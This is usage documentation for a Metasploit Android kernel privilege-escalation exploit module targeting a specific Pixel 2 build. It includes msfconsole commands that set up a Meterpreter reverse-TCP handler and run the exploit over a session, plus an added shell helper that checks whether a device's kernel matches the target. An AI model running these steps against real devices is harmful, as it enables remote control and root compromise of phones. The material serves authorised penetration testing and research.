documentation/modules/exploit/android/local/binder_uaf.md
This exploit module currently targets a very specific build of Android on a specific set of hardware targets:
The module would have to be retargeted for any other potentially vulnerable build or hardware target.
One difficult issue with the Google Pixel 2 is that, while many Google phones have an unlocked bootloader, making it easy to flash older Android revisions, the latest Pixel 2 updates appear to have disabled this feature, or broken flashing of older firmware revisions to the device. This may be a firmware bug or intentional, but Google themselves do not appear to have an answer for the problem. For testing, you may need a phone that has never been updated to a later Android revision.
```
msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
```
```
uname -a
Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
```
Use an LPORT that differs from the port your Android Meterpreter handler is already listening on:

```
msf exploit(multi/handler) > use exploit/android/local/binder_uaf
msf exploit(android/local/binder_uaf) > set LHOST IPADDR
msf exploit(android/local/binder_uaf) > set LPORT 4448
LPORT => 4448
msf exploit(android/local/binder_uaf) > set SESSION -1
SESSION => -1
msf exploit(android/local/binder_uaf) > run
```
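Because the module only works on the exact kernel build shown in the `uname -a` output above, a quick triage step is to compare a device's kernel release and machine type against that documented target before deciding whether the module applies or must be retargeted. The helper below is an added example, not part of the module or its documentation; the target values are copied from the `uname -a` line above, the sample lines are constructed, and the function names are hypothetical.

```shell
#!/bin/sh
# Documented target build for this module (kernel release and machine type
# taken from the `uname -a` output shown above).
TARGET_RELEASE="4.4.177-g83bee1dc48e8"
TARGET_ARCH="aarch64"

# binder_uaf_target_check LINE
#   LINE is one `uname -a` line (e.g. captured via `adb shell uname -a`).
#   Fields: sysname nodename release version... machine [GNU/Linux]
#   Prints "match" (exit 0) when release and machine type equal the documented
#   target, "retarget" (exit 1) otherwise, or "unparsable" (exit 2).
binder_uaf_target_check() {
    set -- $1
    [ "$#" -ge 5 ] || { echo unparsable; return 2; }
    release="$3"
    # machine type is the last field unless a trailing "GNU/Linux" is present
    eval "arch=\${$#}"
    [ "$arch" = "GNU/Linux" ] && eval "arch=\${$(($# - 1))}"
    if [ "$release" = "$TARGET_RELEASE" ] && [ "$arch" = "$TARGET_ARCH" ]; then
        echo match
        return 0
    fi
    echo retarget
    return 1
}

# Constructed sample lines: the documented target, a later kernel build on the
# same hardware, and a 32-bit build of the same kernel release.
SAMPLE_TARGET="Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64"
SAMPLE_OTHER="Linux localhost 4.4.177-gdeadbeef0000 #1 SMP PREEMPT Tue Oct 1 10:00:00 UTC 2019 aarch64"
SAMPLE_ARM32="Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 armv7l"

if [ "${1:-}" = "--demo" ]; then
    for l in "$SAMPLE_TARGET" "$SAMPLE_OTHER" "$SAMPLE_ARM32"; do
        printf '%s -> ' "$l"
        binder_uaf_target_check "$l" || true
    done
fi
```

Run with `--demo` to see the three constructed lines classified, or pipe a live `adb shell uname -a` line into the function.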
This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.